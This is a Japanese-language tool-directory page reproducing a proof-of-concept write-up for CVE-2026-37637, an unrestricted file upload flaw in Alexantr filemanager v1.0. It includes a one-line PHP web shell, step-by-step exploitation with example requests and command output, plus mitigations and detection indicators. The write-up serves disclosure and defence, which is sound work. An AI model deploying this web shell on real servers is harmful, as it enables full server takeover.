Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-37637 — Alexantr filemanager v1.0における、無制限のファイルアップロードによるリモートコード実行 | Kitploit
ツール/GitHubGitHub/slo-cyber-sec/cve-2026-37637
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Alexantr filemanager v1.0における、無制限のファイルアップロードによるリモートコード実行

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-37637

CVE-2026-37637 の概念実証 - Alexantr filemanager v1.0 における filemanager.php の無制限ファイルアップロードによるリモートコード実行

概要

CVE-2026-37637 は、Alexantr filemanager v1.0 に影響を与えるリモートコード実行の脆弱性です。

この脆弱性は filemanager.php コンポーネントに存在し、アップロードされたファイルの検証が不十分であることが原因です。リモートの攻撃者は、悪意のある PHP ファイルを Web アクセス可能なディレクトリにアップロードし、サーバー上で任意のコマンドを実行できます。

CVE ステータス: MITRE に提出済み
研究者: CYBER-SEC ベンダーリポジトリ: https://github.com/alexantr/filemanager


脆弱性の概要

項目説明
CVE IDCVE-2026-37637
脆弱性の種類リモートコード実行
影響を受ける製品Alexantr filemanager
影響を受けるバージョンv1.0
脆弱性のあるコンポーネントfilemanager.php
攻撃ベクトルリモート
認証の必要性デプロイメント/設定に依存
影響任意のコマンド実行
根本原因無制限のファイルアップロードとサーバー側ファイル検証の欠如

影響

攻撃者は、ファイルアップロード機能を通じて悪意のある PHP ファイルをアップロードできます。アップロードされたファイルは Web アクセス可能な場所に保存され、PHP の実行が許可されているため、攻撃者はサーバー上で任意のシステムコマンドを実行できます。

悪用に成功すると、攻撃者は以下のことが可能になります:

  • サーバー上で任意のコマンドを実行
  • 機密ファイルの読み取り
  • アプリケーションファイルの変更または削除
  • 追加のマルウェアや Web シェルのアップロード
  • ホスティング環境内へのさらなる侵入
  • 影響を受けるサーバーの完全な乗っ取り

技術的詳細

このアプリケーションは、ファイル拡張子、MIME タイプ、ファイル内容を適切に検証せずに、ユーザーが任意のファイルをアップロードすることを許可します。

以下のような悪意のある PHP ファイルをアップロードできます:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Web アクセス可能なディレクトリにアップロードされると、攻撃者はブラウザからファイルにアクセスし、cmd パラメータを通じてコマンドを渡すことでコマンドを実行できます。

例:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

これにより、基盤となるオペレーティングシステム上でコマンドが実行されます。


再現手順

1. 脆弱なアプリケーションのクローン

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. PHP 開発サーバーの起動

root@kitploit:~
php -S localhost:8000

3. アプリケーションへのアクセス

ブラウザでアプリケーションを開きます:

root@kitploit:~
http://localhost:8000/filemanager.php

デプロイメントや設定によっては、アプリケーションは以下からもアクセスできます:

root@kitploit:~
http://localhost:8000/pheditor.php

4. 悪意のある PHP ファイルのアップロード

shell.php という名前のファイルを作成します:

root@kitploit:~
<?php system($_GET['cmd']); ?>

アプリケーションのアップロード機能を使用してファイルをアップロードします。

5. コマンドの実行

ファイルをアップロードした後、ブラウザから直接アクセスします:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

悪用が成功すると、サーバーはコマンドを実行し、その出力を返します。

出力例:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

概念実証

悪意のある PHP ペイロード

root@kitploit:~
<?php system($_GET['cmd']); ?>

リクエスト例

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

期待される結果

cmd パラメータを通じて指定されたコマンドがサーバー上で実行されます。


根本原因

この脆弱性は、ファイルアップロード機能におけるサーバー側の検証が不十分であることが原因です。

アプリケーションは以下を適切に制限していません:

  • ファイル拡張子
  • MIME タイプ
  • ファイル内容
  • アップロード先
  • アップロードディレクトリ内の実行権限

その結果、実行可能な PHP ファイルがアップロードされ、直接実行される可能性があります。


推奨される対策

ベンダーとユーザーは、以下の保護策を実装する必要があります。

1. 危険なファイル拡張子のブロック

以下のような実行可能なファイルタイプのアップロードを禁止します:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. 許可リストの使用

期待されるファイルタイプのみを許可します。例:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. MIME タイプとファイル内容の検証

クライアントが提供する Content-Type ヘッダーのみに依存しないでください。

ファイル検証はサーバー側で実行する必要があります。

4. アップロードされたファイルを Web ルートの外に保存

アップロードされたファイルは、直接実行可能または公開アクセス可能であってはなりません。

5. アップロードディレクトリでの PHP 実行の無効化

Apache の場合、.htaccess でこれを行うことができます:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Nginx の場合、アップロードパスでの PHP 処理を防ぎます:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. アップロードされたファイルの名前変更

サーバーが生成したランダムなファイル名を使用し、ユーザーが制御する拡張子を削除します。

7. 適切なアクセス制御の適用

アップロード機能を信頼できるユーザーのみに制限します。


検出

管理者は、Web アクセス可能なディレクトリ内の不審なアップロード済み PHP ファイルを探すことができます。

指標の例:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
アップロードディレクトリ内の .php ファイル

不審なリクエストパターンには以下が含まれる場合があります:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

ログエントリの例:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

免責事項

このリポジトリは、教育および防御的なセキュリティ目的のみで提供されています。

ここに含まれる情報と概念実証は、開発者、システム管理者、セキュリティ専門家が脆弱性を理解し、修正するのに役立つことを目的としています。

明示的な許可なしにこの情報を使用してシステムを攻撃しないでください。コンピュータシステムへの不正アクセスは違法です。

著者は、このリポジトリで提供される情報の誤用について一切責任を負いません。


参考情報

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
ツールをダウンロード